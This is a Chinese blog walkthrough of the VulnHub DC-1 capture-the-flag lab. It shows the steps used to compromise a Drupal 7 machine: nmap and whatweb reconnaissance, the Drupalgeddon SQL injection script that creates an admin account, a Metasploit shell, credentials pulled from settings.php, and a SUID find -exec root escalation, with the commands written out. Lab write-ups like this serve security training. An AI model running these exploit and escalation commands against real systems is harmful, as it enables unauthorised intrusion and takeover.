VULNHUB靶机渗透--DC-1(drupal)

最新推荐文章于 2023-06-25 03:09:44 发布
最新推荐文章于 2023-06-25 03:09:44 发布
阅读量995 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52497013/article/details/121975716
版权

1. nmap扫描

nmap -A 192.168.65.131

发现开启了22、80、111端口
在这里插入图片描述

2. 浏览器打开靶机开启的网站服务

发现是一个网站登陆界面
在这里插入图片描述

3. whatweb扫描出网站模板信息

网站模板是drupal,版本信息是drupal 7
在这里插入图片描述

4. 针对这个版本搜索渗透模块

searchsploit drupal 7

运用这个渗透模块:
Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Add Admin User)
在这里插入图片描述

cat /usr/share/exploitdb/exploits/php/webapps/34992.py

查看脚本信息
其实就是创建一个新的管理员账户,然后登陆网站
在这里插入图片描述

5. 运行这个渗透模块

创建一个用户名为admin1,密码为admin1的管理员账户
参数这样设置:
在这里插入图片描述
用python运行以下脚本

 python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.65.131 -u admin1 -p admin1

在这里插入图片描述
创建完毕,使用这个创建好的管理员账户登陆网站后台,可以看到已经以admin1身份登录成功
在这里插入图片描述
于是直接找到flag3
在这里插入图片描述
提示我们用-exec提权

6. 使用Metesploit渗透模块

获得shell以后
在这里插入图片描述
发现flag1.txt
在这里插入图片描述
提示我们找到网站的配置文件
我找了好久,终于在/var/www/sites/default目录下发现了一个settings.php文件,打开一看发现了flag2,并且找到了数据库用户dbuser,还有其密码R0ck3t
在这里插入图片描述
拿到shell

python -c 'import pty; pty.spawn("/bin/bash")'

并获得交互的shell
在这里插入图片描述

find / -name "*flag*"

找到flag4.txt
在这里插入图片描述

cat /home/flag4/flag4.txt

提示我们提取到root
在这里插入图片描述

7. 提权部分

根据flag3的信息提示可以试着查找靶机上关于root权限的文件

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

find ./ aaa -exec '/bin/sh' \;

在这里插入图片描述
成功提权到root权限。

在这里插入图片描述
找到thefinalflag.txt

_AaRong_
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4746
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
最新发布
m0_56592545的博客
06-25 1099
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
DC-1靶机渗透测试记录
Jach1n
10-09 984
DC-1靶机渗透测试记录
DC系列靶机DC-1
weixin_53067829的博客
07-01 973
DC系列靶机
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal
_Co1a
05-09 866
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
【CyberSecurityLearning 77】DC系列之DC-8渗透测试(Drupal
_Co1a
05-11 722
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描DC-8开放端口 1.2 访问WEB站点 2、渗透过程 2.1 用Sqlmap自动化工具注入 2.2 drush 命令对任意用户密码进行更改(发现没有进到DC-8的shell,行不通) 2.3 John爆破用户名和密码 2.3 用john用户的密码turtle登录后台 3、GetShell(利用php代码执行漏洞) 4、提权 4.1 exim4提权 DC-7靶机渗透测试 实验环境: kali的IP地址:192.168.
DC-1 靶机渗透测试(拿shell,提权)
single_g_l的博客
03-17 4980
目录 一. 环境 二. 信息收集 1. 主机发现 2.访问 192.168.1.184:80 三. 利用msfconsole 攻击(拿到flag1) 1. 漏洞利用成功 2. 进入会话 ,拿到flag1.txt ---shell ​四. 找到配置文件,获取flag2 五. 修改管理员密码,登录网站,拿到flag3 1. 获取交互式shell, 执行MySQL语句 2. 查看管理员用户 3. 修改管理员密码 六. 用find语句,找到flag4 七. SUID提权,获取...
靶场练习第九天~vulnhub靶场之dc-1
qq_57976347的博客
02-03 925
一、环境搭建 靶场下载链接: 百度网盘 请输入提取码 提取码: ih67 1.查看kali的ip:ifconfig 二、信息收集 1.使用namp命令 主机探测: nmap -sP 192.168.101.0/24 正在上传…重新上传取消 查看靶机开放端口号和服务:nmap -A 192.168.101.111 发现开放80端口,访问一下192.168.101.111 Drupal简介: Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到
vulnhubDC-7渗透实战(Drupal 8的php插件利用)
qq_45300786的博客
08-17 301
其实打把思路都差不多,楼主就把打靶过程中遇到的问题和细节指正出来 对于楼主新知识点: Vulnhub靶机实战——DC-7 问题1:网站开始的欢迎页面,对该页面进行编辑,添加一句话PHP代码,并保存为PHP代码(这里我把细节图给补充一下) 问题2:写入反弹shell代码到backups.sh脚本文件中,并在kali监听1234端口,等待计划任务执行,稍微等待后成功getshell(这里的计划任务需要时间,如果等不及,我们可以手动执行) 还有个差不多的参考,其实跟最上面的差不错,不过楼主还是贴出来吧。
P2 利用Vulnhub复现漏洞 - Drupal 远程代码执行漏洞(CVE-2019-6339)
在下小黄的博客
03-19 478
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P2 利用Vulnhub复现漏洞 - Drupal 远程代码执行漏洞(CVE-2019-6339) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月19日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 Drupal 远程代码执行漏洞(CVE-2019-6339)Vulnhub 官方复现三级目录 Vulnhub 官方复现 三级目录 各位路过的朋友,如果觉得
利用Vulnhub复现漏洞 - Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)
JiangBuLiu的博客
07-02 2570
Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md 漏洞原理 Drupal 是一款用量庞大的CMS,其6/7/...
vulnhub】【DC系列】DC1-Drupal 靶机
Nicky_Zheng的博客
01-26 374
1、信息收集 1.1、端口扫描 使用nmap对端口进行扫描,发现存在 80 端口开放,使用的 CMS 为 Drupal 7 (来自查看主页源代码) 1.2、漏洞信息收集 searchsploit发现 Drupal 7 存在 SQL 注入等漏洞,本次先使用 SQL 注入添加管理员账号 kali@kali:~$ searchsploit Drupal 7.0 ----------------------------------------------------------------------------
VulnHubDC-8
weixin_39219503的博客
02-02 400
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-8,367/ 题目信息如下 DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challeng...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_AaRong_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值